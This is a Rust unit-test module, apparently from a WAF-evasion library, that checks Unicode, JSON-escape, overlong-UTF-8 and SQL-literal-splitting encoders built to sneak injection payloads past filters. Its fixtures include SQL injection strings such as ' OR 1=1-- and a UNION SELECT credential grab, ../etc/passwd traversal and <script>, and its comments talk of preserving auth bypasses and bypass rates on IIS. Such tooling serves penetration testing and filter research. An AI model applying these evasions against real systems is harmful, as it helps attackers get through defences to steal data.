1644                (0x1D400..=0x1D419).contains(&(ch as u32)),
1645                "expected math bold capital, got U+{:04X}",
1646                ch as u32
1647            );
1648        }
1649    }
1650
1651    #[test]
1652    fn math_bold_encode_preserves_punctuation() {
1653        // ' OR 1=1-- — only letters/digits transform; punctuation stays
1654        let encoded = math_bold_encode("' OR 1=1--");
1655        // ' space = = - - all unchanged
1656        assert!(encoded.starts_with('\''));
1657        assert!(encoded.contains('='));
1658        assert!(encoded.ends_with("--"));
1659    }
1660
1661    #[test]
1662    fn math_bold_encode_mixed_alphanumeric() {
1663        let encoded = math_bold_encode("Aa0");
1664        // A → 𝐀, a → 𝐚, 0 → 𝟎
1665        let chars: Vec<char> = encoded.chars().collect();
1666        assert_eq!(chars.len(), 3);
1667        assert_eq!(chars[0] as u32, 0x1D400);
1668        assert_eq!(chars[1] as u32, 0x1D41A);
1669        assert_eq!(chars[2] as u32, 0x1D7CE);
1670    }
1671
1672    #[test]
1673    fn math_bold_encode_distinct_from_fullwidth() {
1674        // Fullwidth uses U+FF00 block; math bold uses U+1D400 block
1675        // The same input must produce different bytes (proving they're not equivalent).
1676        assert_ne!(math_bold_encode("SELECT"), fullwidth_encode("SELECT"));
1677    }
1678
1679    #[test]
1680    fn math_bold_encode_empty() {
1681        assert_eq!(math_bold_encode(""), "");
1682    }
1683
1684    // ── math_italic / script / fraktur / double_struck tests ────────────
1685
1686    #[test]
1687    fn math_italic_encode_uppercase() {
1688        assert_eq!(math_italic_encode("A"), "\u{1D434}"); // 𝐴
1689        assert_eq!(math_italic_encode("Z"), "\u{1D44D}"); // 𝑍
1690    }
1691
1692    #[test]
1693    fn math_italic_encode_handles_h_hole() {
1694        // U+1D455 is reserved (the hole); we substitute U+210E.
1695        assert_eq!(math_italic_encode("h"), "\u{210E}");
1696    }
1697
1698    #[test]
1699    fn math_italic_encode_is_distinct_from_bold() {
1700        assert_ne!(math_italic_encode("SELECT"), math_bold_encode("SELECT"));
1701    }
1702
1703    #[test]
1704    fn math_script_encode_fills_all_holes() {
1705        // Every uppercase letter must map to SOMETHING (no panic, no
1706        // fall-through to ASCII).
1707        for c in 'A'..='Z' {
1708            let s: String = c.to_string();
1709            let enc = math_script_encode(&s);
1710            assert!(
1711                enc != s,
1712                "math_script_encode left {c} unchanged — hole not filled"
1713            );
1714        }
1715    }
1716
1717    #[test]
1718    fn math_fraktur_encode_fills_chizr_holes() {
1719        for c in &['C', 'H', 'I', 'R', 'Z'] {
1720            let s: String = c.to_string();
1721            assert!(
1722                math_fraktur_encode(&s) != s,
1723                "math_fraktur_encode left {c} unchanged"
1724            );
1725        }
1726    }
1727
1728    #[test]
1729    fn math_double_struck_encode_digits_distinct_from_bold() {
1730        // double-struck 0 = U+1D7D8 ≠ bold 0 = U+1D7CE
1731        assert_ne!(math_double_struck_encode("0"), math_bold_encode("0"));
1732    }
1733
1734    #[test]
1735    fn math_double_struck_encode_fills_letter_holes() {
1736        for c in &['C', 'H', 'N', 'P', 'Q', 'R', 'Z'] {
1737            let s: String = c.to_string();
1738            assert!(math_double_struck_encode(&s) != s);
1739        }
1740    }
1741
1742    #[test]
1743    fn letterlike_encode_select_payload_uses_letterlike_block() {
1744        let encoded = letterlike_encode("SELECT");
1745        // L → U+2112 SCRIPT CAPITAL L (the headline letterlike sub).
1746        assert!(encoded.contains('\u{2112}'));
1747        // S has no letterlike-block equivalent; falls back to circled
1748        // Latin (U+24CE).
1749        assert!(
1750            encoded
1751                .chars()
1752                .any(|c| c as u32 >= 0x24B6 && c as u32 <= 0x24E9)
1753        );
1754    }
1755
1756    #[test]
1757    fn letterlike_encode_preserves_non_letters() {
1758        assert_eq!(letterlike_encode(" ' = "), " ' = ");
1759    }
1760
1761    #[test]
1762    fn all_new_encoders_preserve_pure_punctuation() {
1763        // Pure punctuation — no letters, no digits — must round-trip
1764        // through every encoder unchanged. (Digits ARE transformed
1765        // by math_double_struck_encode, so we exclude them.)
1766        for f in [
1767            math_italic_encode,
1768            math_script_encode,
1769            math_fraktur_encode,
1770            math_double_struck_encode,
1771            letterlike_encode,
1772        ] {
1773            assert_eq!(f("' = -- /* */ ;"), "' = -- /* */ ;");
1774        }
1775    }
1776
1777    #[test]
1778    fn all_new_encoders_distinct_from_each_other() {
1779        let s = "SELECT";
1780        let bold = math_bold_encode(s);
1781        let italic = math_italic_encode(s);
1782        let script = math_script_encode(s);
1783        let fraktur = math_fraktur_encode(s);
1784        let dstruck = math_double_struck_encode(s);
1785        let letter = letterlike_encode(s);
1786        let outputs = [bold, italic, script, fraktur, dstruck, letter];
1787        let set: std::collections::BTreeSet<&String> = outputs.iter().collect();
1788        assert_eq!(
1789            set.len(),
1790            outputs.len(),
1791            "two encoders produced identical output"
1792        );
1793    }
1794
1795    // ── zero-width + combining-mark injection tests ────────────────────
1796
1797    #[test]
1798    fn zero_width_inject_adds_chars_between_letters() {
1799        let out = zero_width_inject("script", '\u{200B}');
1800        assert!(out.contains("scr\u{200B}ipt") || out.contains("s\u{200B}c"));
1801        // Length grows by N-1 codepoints (one between each pair).
1802        assert_eq!(out.chars().count(), 6 + 5);
1803    }
1804
1805    #[test]
1806    fn zero_width_inject_preserves_non_alnum() {
1807        // Insert only between alnum chars, not punctuation.
1808        let out = zero_width_inject("' OR '1'='1", '\u{200C}');
1809        // The lone `'` chars don't trigger insertion before them.
1810        assert!(!out.starts_with('\u{200C}'));
1811    }
1812
1813    #[test]
1814    fn zero_width_defaults_count_correct() {
1815        // Five-element cycle so rotation covers ZWSP/ZWNJ/ZWJ/BOM/CGJ.
1816        assert_eq!(ZERO_WIDTH_DEFAULTS.len(), 5);
1817    }
1818
1819    #[test]
1820    fn combining_mark_inject_only_after_letters() {
1821        let out = combining_mark_inject("a1b2", '\u{0308}');
1822        // 'a' + ̈ + '1' + 'b' + ̈ + '2' — digits don't get marks.
1823        assert_eq!(out, "a\u{0308}1b\u{0308}2");
1824    }
1825
1826    // ── script_homoglyph_encode tests ──────────────────────────────────
1827
1828    #[test]
1829    fn script_homoglyph_select_uses_cyrillic_letters() {
1830        let out = script_homoglyph_encode("SELECT");
1831        // S → Cyrillic (no Cyrillic S — falls through to itself OR
1832        // gets mapped to one of the upper substitutions). E → U+0415.
1833        assert!(out.contains('\u{0415}'));
1834        // T → U+0422
1835        assert!(out.contains('\u{0422}'));
1836        // Output is byte-distinct from input.
1837        assert_ne!(out, "SELECT");
1838    }
1839
1840    #[test]
1841    fn script_homoglyph_preserves_punctuation() {
1842        assert_eq!(script_homoglyph_encode("' = -- ;"), "' = -- ;");
1843    }
1844
1845    // ── turkish_i + sharp_s tests ──────────────────────────────────────
1846
1847    #[test]
1848    fn turkish_i_encode_replaces_only_i() {
1849        assert_eq!(turkish_i_encode("script"), "scr\u{0131}pt");
1850        assert_eq!(turkish_i_encode("INSERT"), "\u{0130}NSERT");
1851        // 'a', 'b' etc. unchanged.
1852        assert_eq!(turkish_i_encode("abcdefg"), "abcdefg");
1853    }
1854
1855    #[test]
1856    fn sharp_s_encode_replaces_only_s() {
1857        assert_eq!(sharp_s_encode("select"), "\u{00DF}elect");
1858        assert_eq!(sharp_s_encode("SELECT"), "\u{00DF}ELECT");
1859    }
1860
1861    // ── json_key_unicode_escape tests ──────────────────────────────────
1862
1863    #[test]
1864    fn json_key_escape_full_id_payload() {
1865        let s = json_key_unicode_escape("id", "1 OR 1=1--");
1866        // Each char of "id" becomes \uXXXX.
1867        assert!(s.contains("\\u0069")); // i
1868        assert!(s.contains("\\u0064")); // d
1869        // Value JSON-encoded.
1870        assert!(s.contains("1 OR 1=1--"));
1871    }
1872
1873    #[test]
1874    fn json_key_escape_round_trips_through_serde() {
1875        let s = json_key_unicode_escape("admin", "true");
1876        let parsed: serde_json::Value = serde_json::from_str(&s).expect("valid JSON");
1877        // After parsing, the key decodes back to "admin".
1878        assert!(parsed.get("admin").is_some(), "decoded key missing: {s}");
1879    }
1880
1881    #[test]
1882    fn json_key_escape_preserves_value_quotes() {
1883        let s = json_key_unicode_escape("k", "v\"q");
1884        // serde_json escapes the inner quote.
1885        assert!(s.contains("v\\\"q"));
1886    }
1887
1888    // ── overlong_utf8_path tests ───────────────────────────────────────
1889
1890    #[test]
1891    fn overlong_utf8_2byte_dot_slash_replaces() {
1892        assert_eq!(
1893            overlong_utf8_path("../etc/passwd", 2),
1894            "%c0%ae%c0%ae%c0%afetc%c0%afpasswd"
1895        );
1896    }
1897
1898    #[test]
1899    fn overlong_utf8_3byte_dot_slash() {
1900        let out = overlong_utf8_path("..", 3);
1901        assert_eq!(out, "%e0%80%ae%e0%80%ae");
1902    }
1903
1904    #[test]
1905    fn overlong_utf8_4byte_default() {
1906        let out = overlong_utf8_path(".", 4);
1907        assert_eq!(out, "%f0%80%80%ae");
1908    }
1909
1910    #[test]
1911    fn overlong_utf8_preserves_non_traversal_chars() {
1912        let out = overlong_utf8_path("../etc/passwd", 2);
1913        assert!(out.contains("etc"));
1914        assert!(out.contains("passwd"));
1915    }
1916
1917    #[test]
1918    fn overlong_utf8_handles_backslash() {
1919        assert_eq!(
1920            overlong_utf8_path("..\\windows", 2),
1921            "%c0%ae%c0%ae%c0%5cwindows"
1922        );
1923    }
1924
1925    // ── bidi_inject tests ──────────────────────────────────────────────
1926
1927    #[test]
1928    fn bidi_inject_wraps_with_rlo_and_pdf() {
1929        let out = bidi_inject("tceleS");
1930        assert!(out.starts_with('\u{202E}'));
1931        assert!(out.ends_with('\u{202C}'));
1932        // 1 RLO + 6 letters + 1 PDF.
1933        assert_eq!(out.chars().count(), 8);
1934    }
1935
1936    // ── sql_concat_split tests ─────────────────────────────────────────
1937
1938    #[test]
1939    fn sql_concat_split_admin() {
1940        assert_eq!(sql_concat_split("'admin'"), "CONCAT('a','d','m','i','n')");
1941    }
1942
1943    #[test]
1944    fn sql_concat_split_password() {
1945        assert_eq!(
1946            sql_concat_split("'password'"),
1947            "CONCAT('p','a','s','s','w','o','r','d')"
1948        );
1949    }
1950
1951    #[test]
1952    fn sql_concat_split_in_clause() {
1953        assert_eq!(
1954            sql_concat_split("WHERE u='admin'"),
1955            "WHERE u=CONCAT('a','d','m','i','n')"
1956        );
1957    }
1958
1959    #[test]
1960    fn sql_concat_split_no_quotes_passthrough() {
1961        // No single quotes → input unchanged
1962        assert_eq!(sql_concat_split("SELECT 1"), "SELECT 1");
1963    }
1964
1965    #[test]
1966    fn sql_concat_split_multiple_literals() {
1967        // Two separate strings get independent CONCAT calls
1968        assert_eq!(sql_concat_split("'a' OR 'b'"), "CONCAT('a') OR CONCAT('b')");
1969    }
1970
1971    #[test]
1972    fn sql_concat_split_empty_literal() {
1973        assert_eq!(sql_concat_split("''"), "CONCAT('')");
1974    }
1975
1976    #[test]
1977    fn sql_concat_split_unbalanced_quote_passthrough() {
1978        // Lone opening quote with no closer → output preserves it
1979        assert_eq!(sql_concat_split("'unclosed"), "'unclosed");
1980    }
1981
1982    #[test]
1983    fn sql_concat_split_preserves_non_quote_chars() {
1984        // SQL keywords, operators, whitespace all unchanged
1985        let payload = "1=1; SELECT 'x', 'y' FROM dual";
1986        let out = sql_concat_split(payload);
1987        assert!(out.contains("SELECT"));
1988        assert!(out.contains("FROM dual"));
1989        assert!(out.contains("CONCAT('x')"));
1990        assert!(out.contains("CONCAT('y')"));
1991    }
1992
1993    #[test]
1994    fn sql_concat_split_real_injection_payload() {
1995        // Classic UNION SELECT extraction
1996        let payload = "' UNION SELECT 'admin','password' FROM users--";
1997        let out = sql_concat_split(payload);
1998        // Outer ' is unbalanced; collects up to ' before admin then closes there.
1999        // The first CONCAT contains the OR/UNION/SELECT keywords as char args —
2000        // not a useful execution path, but it demonstrates the tamper is
2001        // applied uniformly. The point is: every single-quoted region becomes
2002        // CONCAT, so a downstream layer can compose this with other tampers.
2003        assert!(out.contains("CONCAT("));
2004        // Real payloads that benefit start the quote OPEN and close it
2005        // before the SQL keywords, e.g. "1' UNION SELECT 'admin'--" where
2006        // the embedded 'admin' is the bypass target.
2007    }
2008
2009    // ── sql_char_decompose tests ───────────────────────────────────────
2010
2011    #[test]
2012    fn sql_char_decompose_admin() {
2013        // 'a'=97 'd'=100 'm'=109 'i'=105 'n'=110
2014        assert_eq!(sql_char_decompose("'admin'"), "CHAR(97,100,109,105,110)");
2015    }
2016
2017    #[test]
2018    fn sql_char_decompose_password() {
2019        assert_eq!(
2020            sql_char_decompose("'password'"),
2021            "CHAR(112,97,115,115,119,111,114,100)"
2022        );
2023    }
2024
2025    #[test]
2026    fn sql_char_decompose_path_literal() {
2027        // '/etc/passwd' — every byte represented numerically
2028        // '/'=47 'e'=101 't'=116 'c'=99 '/'=47 'p'=112 'a'=97 's'=115 's'=115 'w'=119 'd'=100
2029        assert_eq!(
2030            sql_char_decompose("'/etc/passwd'"),
2031            "CHAR(47,101,116,99,47,112,97,115,115,119,100)"
2032        );
2033    }
2034
2035    #[test]
2036    fn sql_char_decompose_no_quotes_passthrough() {
2037        assert_eq!(sql_char_decompose("SELECT 1"), "SELECT 1");
2038    }
2039
2040    #[test]
2041    fn sql_char_decompose_empty_literal_preserves_empty_string() {
2042        // F60 regression: pre-fix `''` produced `CHAR()` which is
2043        // NULL in MySQL — breaking `pass='' OR 1=1` auth bypass
2044        // (`= NULL` is never TRUE). Post-fix the empty literal
2045        // round-trips unchanged.
2046        assert_eq!(sql_char_decompose("''"), "''");
2047        // Embedded in a longer payload too.
2048        assert_eq!(
2049            sql_char_decompose("WHERE pass='' OR 1=1"),
2050            "WHERE pass='' OR 1=1"
2051        );
2052    }
2053
2054    // sql_char_decompose_empty_literal_preserves_empty_string above
2055    // supersedes the pre-fix test that asserted CHAR() — kept as a
2056    // marker rather than re-asserting the buggy old contract.
2057
2058    #[test]
2059    fn sql_char_decompose_unbalanced_passthrough() {
2060        assert_eq!(sql_char_decompose("'unclosed"), "'unclosed");
2061    }
2062
2063    #[test]
2064    fn sql_char_decompose_multiple_literals() {
2065        // 'a'=97  'b'=98
2066        assert_eq!(sql_char_decompose("'a' OR 'b'"), "CHAR(97) OR CHAR(98)");
2067    }
2068
2069    #[test]
2070    fn sql_char_decompose_distinct_from_concat_split() {
2071        // CONCAT uses single-char strings; CHAR uses ints. Outputs differ.
2072        assert_ne!(sql_char_decompose("'admin'"), sql_concat_split("'admin'"));
2073    }
2074
2075    #[test]
2076    fn sql_char_decompose_real_injection() {
2077        let payload = "1 OR username='admin'--";
2078        let out = sql_char_decompose(payload);
2079        assert_eq!(out, "1 OR username=CHAR(97,100,109,105,110)--");
2080    }
2081
2082    // ── pg_chr_decompose tests ─────────────────────────────────────────
2083
2084    #[test]
2085    fn pg_chr_decompose_admin() {
2086        assert_eq!(
2087            pg_chr_decompose("'admin'"),
2088            "(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))"
2089        );
2090    }
2091
2092    #[test]
2093    fn pg_chr_decompose_empty_literal() {
2094        assert_eq!(pg_chr_decompose("''"), "('')");
2095    }
2096
2097    #[test]
2098    fn pg_chr_decompose_in_where_clause() {
2099        assert_eq!(pg_chr_decompose("WHERE u='a'"), "WHERE u=(CHR(97))");
2100    }
2101
2102    #[test]
2103    fn pg_chr_decompose_distinct_from_char_decompose() {
2104        // CHR() is unary + pipe-concat; CHAR() is variadic. Different shapes.
2105        assert_ne!(pg_chr_decompose("'admin'"), sql_char_decompose("'admin'"));
2106    }
2107
2108    #[test]
2109    fn pg_chr_decompose_unbalanced_passthrough() {
2110        assert_eq!(pg_chr_decompose("'unclosed"), "'unclosed");
2111    }
2112
2113    #[test]
2114    fn sql_concat_split_isolated_literal_keeps_other_tokens() {
2115        // From a real payload: id=1 AND username = 'admin' AND status = 1
2116        let payload = "id=1 AND username='admin' AND status=1";
2117        let out = sql_concat_split(payload);
2118        assert_eq!(
2119            out,
2120            "id=1 AND username=CONCAT('a','d','m','i','n') AND status=1"
2121        );
2122    }
2123
2124    #[test]
2125    fn unicode_encode_empty() {
2126        assert_eq!(unicode_encode(""), "");
2127    }
2128
2129    // ── Fullwidth encoding tests ───────────────────────────────────────
2130
2131    #[test]
2132    fn fullwidth_encode_sql_keywords() {
2133        let encoded = fullwidth_encode("SELECT");
2134        assert_eq!(encoded, "ＳＥＬＥＣＴ");
2135        // Every ASCII letter should be in fullwidth range
2136        for ch in encoded.chars() {
2137            assert!(
2138                ch as u32 >= 0xFF01,
2139                "expected fullwidth char, got {ch} (U+{:04X})",
2140                ch as u32
2141            );
2142        }
2143    }
2144
2145    #[test]
2146    fn fullwidth_encode_spaces() {
2147        let encoded = fullwidth_encode("A B");
2148        assert!(
2149            encoded.contains('\u{3000}'),
2150            "space should become ideographic space"
2151        );
2152    }
2153
2154    #[test]
2155    fn fullwidth_encode_preserves_non_ascii() {
2156        let encoded = fullwidth_encode("日本語");
2157        assert_eq!(encoded, "日本語", "non-ASCII should pass through unchanged");
2158    }
2159
2160    #[test]
2161    fn fullwidth_encode_operators() {
2162        let encoded = fullwidth_encode("1=1");
2163        assert_eq!(encoded, "１＝１");
2164    }
2165
2166    #[test]
2167    fn fullwidth_encode_sqli_payload() {
2168        let encoded = fullwidth_encode("' OR 1=1--");
2169        // Should contain fullwidth equivalents, not ASCII
2170        assert!(!encoded.contains("OR"), "should not contain ASCII 'OR'");
2171        assert!(encoded.contains("ＯＲ"), "should contain fullwidth 'ＯＲ'");
2172    }
2173
2174    #[test]
2175    fn fullwidth_encode_empty() {
2176        assert_eq!(fullwidth_encode(""), "");
2177    }
2178
2179    // ── Homoglyph encoding tests ───────────────────────────────────────
2180
2181    #[test]
2182    fn homoglyph_preserves_sql_string_delimiters() {
2183        // Regression for F56: pre-fix `'` was mapped to U+2019,
2184        // destroying the SQL context-break the payload depends on.
2185        // U+2019 is not a SQL string delimiter — the host query's
2186        // string literal never closes and the injection becomes
2187        // inert. Verify the delimiters survive verbatim.
2188        let encoded = homoglyph_encode("' OR '1'='1");
2189        // Single + double quotes pass through unchanged.
2190        assert!(
2191            encoded.contains('\''),
2192            "ASCII single quote MUST be preserved for SQL: {encoded}"
2193        );
2194        assert!(
2195            !encoded.contains('\u{2019}'),
2196            "U+2019 right-single-quote must NOT appear: {encoded}"
2197        );
2198        // But the equals sign (non-delimiter) still gets mutated —
2199        // proves the function isn't a complete no-op.
2200        assert!(
2201            encoded.contains('\u{FF1D}'),
2202            "equals sign should still mutate to fullwidth: {encoded}"
2203        );
2204    }
2205
2206    #[test]
2207    fn homoglyph_preserves_ascii_double_quote() {
2208        let encoded = homoglyph_encode(r#""admin" OR "1"="1""#);
2209        assert!(
2210            encoded.contains('"'),
2211            "ASCII double quote MUST be preserved: {encoded}"
2212        );
2213        assert!(
2214            !encoded.contains('\u{201D}'),
2215            "U+201D right-double-quote must NOT appear: {encoded}"
2216        );
2217    }
2218
2219    #[test]
2220    fn homoglyph_replaces_angle_brackets() {
2221        let encoded = homoglyph_encode("<script>");
2222        assert!(!encoded.contains('<'), "ASCII < should be replaced");
2223        assert!(!encoded.contains('>'), "ASCII > should be replaced");
2224        assert!(encoded.contains('\u{FF1C}'), "should contain fullwidth <");
2225        assert!(encoded.contains('\u{FF1E}'), "should contain fullwidth >");
2226    }
2227
2228    #[test]
2229    fn homoglyph_replaces_equals() {
2230        let encoded = homoglyph_encode("1=1");
2231        assert!(!encoded.contains('='), "ASCII = should be replaced");
2232        assert!(encoded.contains('\u{FF1D}'), "should contain fullwidth =");
2233    }
2234
2235    #[test]
2236    fn homoglyph_preserves_letters() {
2237        let encoded = homoglyph_encode("SELECT");
2238        assert_eq!(encoded, "SELECT", "letters should be preserved");
2239    }
2240
2241    #[test]
2242    fn homoglyph_encode_empty() {
2243        assert_eq!(homoglyph_encode(""), "");
2244    }
2245
2246    #[test]
2247    fn homoglyph_replaces_parens() {
2248        let encoded = homoglyph_encode("fn()");
2249        assert!(encoded.contains('\u{FF08}'), "should contain fullwidth (");
2250        assert!(encoded.contains('\u{FF09}'), "should contain fullwidth )");
2251    }
2252
2253    // ── Bug 2 regression: iis_unicode_encode non-BMP adversarial twins ──
2254    //
2255    // PRE-FIX BUG: the loop body cast `ch as u32` into a %uXXXX format
2256    // without checking whether `code > 0xFFFF`. For supplementary-plane
2257    // characters (U+10000 and above) this produced a 5-digit hex sequence
2258    // like `%u1F600`, which IIS's %u decoder rejects (its format is
2259    // strictly 4 hex digits). The bypass looked encoded but was actually
2260    // undecodable on any real IIS target — a silent bypass-rate killer.
2261    // Fixed: emit a UTF-16 surrogate pair `%uHIGH%uLOW` for non-BMP chars.
2262
2263    #[test]
2264    fn iis_unicode_encode_lowest_non_bmp_u10000() {
2265        // U+10000 is the very first supplementary-plane codepoint (LINEAR B
2266        // SYLLABLE B008 A). Pre-fix: emitted `%u10000` (5 hex digits —
2267        // invalid IIS format). Post-fix: must emit the surrogate pair
2268        // %uD800%uDC00 (high=0xD800, low=0xDC00 for U+10000).
2269        let ch = '\u{10000}'; // U+10000
2270        let encoded = iis_unicode_encode(&ch.to_string());
2271        assert_eq!(
2272            encoded, "%uD800%uDC00",
2273            "U+10000 (lowest non-BMP) must encode as surrogate pair %uD800%uDC00, \
2274             not the invalid %u10000"
2275        );
2276        // Anti-regression: no 5-digit %u sequence.
2277        for hex_run in encoded.split("%u").skip(1) {
2278            let hex_part: String = hex_run
2279                .chars()
2280                .take_while(|c| c.is_ascii_hexdigit())
2281                .collect();
2282            assert_eq!(
2283                hex_part.len(),
2284                4,
2285                "every %u sequence must be exactly 4 hex digits (IIS spec); \
2286                 got {hex_part:?} in {encoded:?}"
2287            );
2288        }
2289    }
2290
2291    #[test]
2292    fn iis_unicode_encode_high_cjk_supplement_u20000() {
2293        // U+20000 is the first codepoint in CJK Unified Ideographs Extension
2294        // B (𠀀). Pre-fix: emitted `%u20000` (5 hex digits — IIS rejects).
2295        // Post-fix: surrogate pair calculation:
2296        //   surrogate_base = 0x20000 - 0x10000 = 0x10000
2297        //   high = 0xD800 + (0x10000 >> 10) = 0xD800 + 0x40 = 0xD840
2298        //   low  = 0xDC00 + (0x10000 & 0x3FF) = 0xDC00 + 0x00 = 0xDC00
2299        let ch = '\u{20000}';
2300        let encoded = iis_unicode_encode(&ch.to_string());
2301        assert_eq!(
2302            encoded, "%uD840%uDC00",
2303            "U+20000 (CJK Supplement) must encode as %uD840%uDC00"
2304        );
2305        for hex_run in encoded.split("%u").skip(1) {
2306            let hex_part: String = hex_run
2307                .chars()
2308                .take_while(|c| c.is_ascii_hexdigit())
2309                .collect();
2310            assert_eq!(
2311                hex_part.len(),
2312                4,
2313                "each %u group must be 4 hex digits; got {hex_part:?}"
2314            );
2315        }
2316    }
2317
2318    // ── §1 SPEED regression pins: byte-slice lookahead in json_unicode_alnum
2319    // and json_unicode_full (replacing Vec<char> collect). These tests pin
2320    // the observable contract so a revert to Vec<char> (or a bad rewrite
2321    // that breaks the ASCII-byte-boundary assumption) is caught immediately.
2322
2323    #[test]
2324    fn json_unicode_alnum_idempotency_multi_pre_escaped() {
2325        // A payload with TWO pre-escaped sequences back-to-back. The
2326        // byte-slice lookahead must advance the iterator correctly for
2327        // each and not double-count the second `\u`.
2328        let p = "\\u0041\\u0042"; // Already-escaped A, B
2329        let once = json_unicode_alnum(p);
2330        let twice = json_unicode_alnum(&once);
2331        // Both passes: no change — the sequences are already `\uXXXX`.
2332        assert_eq!(once, p, "first pass on pre-escaped must be a no-op");
2333        assert_eq!(twice, p, "second pass must also be a no-op");
2334    }
2335
2336    #[test]
2337    fn json_unicode_alnum_incomplete_escape_not_skipped() {
2338        // `\u004` (5 chars total but only 3 hex digits after `u`) must NOT
2339        // be treated as a pre-escaped sequence — the 4th hex digit is absent.
2340        // The `\` gets escaped (it's not alnum), `u` and `0`, `0`, `4` are
2341        // alnum and each get their own `\uXXXX`. This confirms the lookahead
2342        // correctly requires exactly 4 hex digits.
2343        let out = json_unicode_alnum("\\u004");
2344        // `\` → not alnum → bare `\`; `u`,`0`,`0`,`4` → each `\uXXXX`.
2345        // Net: the string is NOT passed through as-is.
2346        assert_ne!(out, "\\u004", "incomplete escape must not be skipped");
2347    }
2348
2349    #[test]
2350    fn json_unicode_full_idempotency_multi_pre_escaped() {
2351        // Same as alnum variant but for json_unicode_full.
2352        let p = "\\u0041\\u0042";
2353        let once = json_unicode_full(p);
2354        let twice = json_unicode_full(&once);
2355        assert_eq!(once, p, "first pass: pre-escaped must survive");
2356        assert_eq!(twice, p, "second pass: still a no-op");
2357    }
2358
2359    #[test]
2360    fn json_unicode_full_escapes_non_alnum_too() {
2361        // json_unicode_full escapes EVERY char — verify a space (U+0020)
2362        // and apostrophe (U+0027) are escaped, unlike json_unicode_alnum
2363        // which leaves punctuation bare.
2364        let out = json_unicode_full("' '");
2365        assert!(out.contains("\\u0027"), "apostrophe must be escaped");
2366        assert!(out.contains("\\u0020"), "space must be escaped");
2367    }
2368
2369    #[test]
2370    fn overlong_utf8_path_speed_opt_preserves_passthrough_chars() {
2371        // §1 SPEED: the push-loop rewrite must leave non-special chars
2372        // unchanged. Mix of alphabetic, digit, and special chars.
2373        let out = overlong_utf8_path("admin/../secret.txt", 2);
2374        assert!(out.contains("admin"));
2375        assert!(out.contains("secret"));
2376        assert!(out.contains("txt"));
2377        assert!(!out.contains('.')); // dots replaced
2378        assert!(!out.contains('/')); // slashes replaced
2379    }
2380
2381    #[test]
2382    fn overlong_utf8_path_empty_input_empty_output() {
2383        assert_eq!(overlong_utf8_path("", 2), "");
2384    }
2385}
wafrift_encoding/encoding/unicode.rs

wafrift_encoding/encoding/
unicode.rs